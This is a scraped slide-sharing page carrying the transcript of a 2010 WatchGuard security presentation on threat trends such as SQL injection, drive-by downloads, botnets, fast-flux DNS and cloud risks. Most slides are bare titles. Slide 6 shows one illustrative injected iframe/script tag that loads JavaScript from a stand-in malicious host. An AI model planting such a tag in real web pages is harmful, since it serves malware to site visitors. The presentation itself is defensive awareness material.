1 / 33

Securing the NOW

Securing the NOW. Coy Thorp Security Sales Engineer, WatchGuard. 2010 Threat Trends. The Web is Still the Primary Threat Vector. Why Attackers Moved to the Web. Common Web Attacks. Combined Web Attacks Common. Part 2: Drive-by Download. Part 1: Automated SQL Injection Attack. DB. DB.

long
Download Presentation

Securing the NOW

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript


  1. Securing the NOW Coy Thorp Security Sales Engineer, WatchGuard

  2. 2010 Threat Trends

  3. The Web is Still the Primary Threat Vector

  4. Why Attackers Moved to the Web

  5. Common Web Attacks

  6. Combined Web Attacks Common Part 2: Drive-by Download Part 1: Automated SQL Injection Attack DB DB <iframe><script src=“http://EvilWebSite.cn/EvilJavaScript.js”></scirpt></iframe>

  7. Legitimate Sites Serve Malware

  8. Social Networks = Malware Cesspool Huge Popularity Social Issues Technical Issues

  9. Mitigate the Risk

  10. Malware Volume Out of Control

  11. Malware Volume Out of Control x6 ??? x3

  12. Malware Volume in 2009

  13. Automatic Packing and Crypting

  14. Mitigate the Risk

  15. Botnet Evolution Continues to Threaten Networks

  16. BotnetsStill Evolving Quickly

  17. BotnetsStill the Swiss Army Knife of Malware

  18. Bot Client (Trojan) Most Popular Payload Most Common “Child” Malware Microsoft Security Intelligence Report 2009 Most Common “Parent” Malware Microsoft Security Intelligence Report 2009

  19. Mitigate the Risk

  20. Malware Networks Very Dynamic

  21. Malware Delivery More Dynamic/Agile Between their increased reliance on botnets and the introduction of new evasion techniques, the servers that deliver malware have become much more dynamic and Agile

  22. Fast Flux DNS – Single Flux

  23. Fast Flux DNS – Double Flux

  24. Mitigate the Risk

  25. Attackers Data Focused

  26. Malware Financially Driven

  27. Attackers Data Focused Attackers are financially motivated and sensitive data is valuable Security solutions that directly protect data (DLP, full disk encryption) will become more popular in 2010 and beyond.

  28. Mitigate the Risks

  29. The Cloud: Friend and Foe

  30. “Cloud Computing” Presents Dangers Cloud computing solutions (SaaS, PaaS, etc.) are exciting and useful, but they use complex technologies that introduce security issues – primarily issues centered around entrusting sensitive data with a 3rd party

  31. Cloud-based Security Presents Opportunities! Sharing “security intelligence” gathered by thousands of security appliances to one cloud-based authority will solve many security problems, and doesn’t not tend to share the security risks of “cloud computing”

  32. Mitigate the Risk

  33. I mean, Thank You! Heh, j/k ;) You’re Welcome!

More Related